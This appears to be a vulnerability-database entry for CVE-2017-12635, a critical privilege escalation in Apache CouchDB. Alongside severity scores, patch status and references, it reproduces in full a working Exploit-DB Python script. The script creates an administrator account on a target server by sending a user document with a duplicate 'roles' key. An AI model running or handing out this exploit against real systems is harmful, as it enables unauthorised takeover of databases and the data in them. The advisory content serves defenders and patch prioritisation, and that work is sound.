CVE-2017-12635
Severity: critical
CVSS v3: 9.8
CVSS v4: n/a
VIR risk: 10.0
Description
Multiple issues in CouchDB.
Predictions
Exploit likelihood: 97%
Patch ETA: n/a
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
```python
#!/usr/bin/env python
'''
@author: r4wd3r
@license: MIT License
@contact: r4wd3r@gmail.com
'''
# Python 2 script (uses print statements); requires the "requests" package.
import argparse
import re
import sys
import requests

parser = argparse.ArgumentParser(
    description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
    ' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
                    type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
                    type=str, default='couchapass')
args = parser.parse_args()

host = args.host
port = args.port
user = args.user
password = args.password

# Accept only a dotted-quad IPv4 address as the target (raw string so "\." is a literal dot).
pat_ip = re.compile(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
    print "[x] Wrong host. Must be a valid IP address."
    sys.exit(1)

print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port

url = 'http://' + host + ':' + port

# Check that the CouchDB HTTP endpoint is reachable before sending anything.
try:
    rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
    print "[x] Server is taking too long to answer. Exiting."
    sys.exit(1)
except requests.ConnectionError:
    print "[x] Unable to connect to the remote host."
    sys.exit(1)

# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'

try:
    rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
    print "[x] ERROR: Unable to create the user on remote host."
    sys.exit(1)

if rcu.status_code == 201:
    print "[+] User " + user + " with password " + password + " successfully created."
    sys.exit(0)
else:
    print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."
```
Apache CouchDB - Arbitrary Command Execution (Metasploit)
Metasploit modules
OS impact
SUSE (affected, 1 release)
| Version | Status | Fixed in |
|---|---|---|
| n/a | Affected | n/a |
Arch (fixed, 1 release)
| Version | Status | Fixed in |
|---|---|---|
| n/a | Fixed | 2.1.1-1 |
References
- https://security.archlinux.org/ASA-201711-24
- http://www.securityfocus.com/bid/101868
- https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67%40%3Cdev.couchdb.apache.org%3E
- https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html
- https://security.gentoo.org/glsa/201711-16
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us
- https://www.exploit-db.com/exploits/44498/
- https://www.exploit-db.com/exploits/45019/
- https://www.suse.com/security/cve/CVE-2017-12635.html
CWEs
CWE-269